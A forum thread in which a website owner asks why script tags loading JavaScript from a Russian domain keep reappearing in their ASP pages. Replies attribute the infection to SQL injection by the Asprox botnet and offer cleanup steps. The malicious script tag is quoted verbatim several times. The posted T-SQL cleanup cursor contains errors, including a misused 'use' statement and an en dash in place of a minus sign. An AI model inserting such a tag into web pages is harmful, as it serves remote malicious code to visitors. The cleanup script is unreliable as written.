Member Avatar for pandi-nissi

Sir
I have created one website When i hosted in server automatically adds malware,
when viewing source code following lines are automatically added

<script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script>

How to get out of this malware line from my website.If i remove those lines and upload also again those line are added automatically how to solve this problem ?? how this line are added automatically ??

Kindly help on above issue

  • 7 Contributors
  • 20 Replies
  • 115 Views
  • 2 Weeks Discussion Span
  • Latest Post Latest Post by omol
Member Avatar for Demiloy

Ask your server host to change that (unlikely) or get a new one. That's the only way, probably.

Member Avatar for buddylee17

Yeah, report this to your host. If they want your business, they'll get it fixed. Else, start shopping for another host. Meanwhile, backup your site and make sure that none of the mess gets carried over.

Member Avatar for peter_budo

What you using PHP/ASP/or just simple HTML? Was this JavaScript added to your records in database or just to your pages?

Member Avatar for pandi-nissi

What you using PHP/ASP/or just simple HTML? Was this JavaScript added to your records in database or just to your pages?

We are using HTML and ASP, these lines are add in web page not in DB.

Member Avatar for buddylee17

Sounds like XSS

Member Avatar for peter_budo

Yes, one of the possible ways...

Member Avatar for Demiloy

What is your host? Also, are you uploading the files directly, but it's still getting put in. Or are you, say, putting the text into a built-in text editor there, and then it's put in?

Member Avatar for MidiMagic

The host is adding them to display advertising. That's how you get free web hosting.

Member Avatar for peter_budo

The host is adding them to display advertising. That's how you get free web hosting.

Not in this case, this know problem with some guys injecting JavaScript either into database, or part of web page usually through feed. If you actually care to copy & paste link to the site into your browser and try to access it, you get warning from google that site contains nasties...

Member Avatar for MidiMagic

Report it to the ISP administrator.

If the ISP won't or can't stop it, change ISP services.

Member Avatar for 123468743867143

(<script src=http://www.uhwc.ru/js.js></script>)

Hi,
I have had the same problem and was even tagged by Google.

The only way to do it is open your entire web site (I mean all of the files) in whatever software you use, do a search and replace. Change all of your passwords (Server, database, email, etc ...).

Mine has not come back since.

My problem started around Mid August 2008 ... Is Godaddy you hosting company by any chance?

Member Avatar for omol

You have a form on your website that has been exploited. It's part of a very big botnet that automatically finds vunribiltys for asp and injects source into one of your fields. Fix the problem with correct error checking and then edit your database and remove the javascript links.

If you want to find out more infomation about this botnet it's been given the alias asprox.

Member Avatar for 123468743867143

I am looking into it right now. I thought my problem was over with. This is scary. I have had inconsistent behavior from MySQL and your input might help me pint point the issue. Thank you.

Member Avatar for omol

Good luck, if you get stuck let me know and i will help further.

Member Avatar for 123468743867143

Hi Omol,

Since you asked ... I have been looking into my db (not very good at it though) ... what exactly am I looking for? In the web pages, it was easy to find the intrusive url and delete. What do I search for? I tried asprox, ect ... nothing found.

Thank you.

Rachel

Member Avatar for 123468743867143

Yes, MySQL. I looked for js.js. in db, not there.

I did remove js.js from the website pages a while back. I checked again, it has not come back.

Something is making my database inconsistent ... Users able to register a new listing one minute but not the other (while the database is still taking their info but not publishing it back to the site).

Member Avatar for omol

Sorry i should not edit posts.

Heres the fix. Replace infected_table with the table name that is infected on your site.

use <infected_table>
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 –
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+'])))
)
where ['+@C+'] like ''%<script%</script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

If you need to know more, or want more infomation have a look at.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf

Member Avatar for 123468743867143

Thank you very much. you are great.

Member Avatar for omol

One thing, your going to have to clean up your code and get some validation in place etc. Again if you need help with this let me know.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.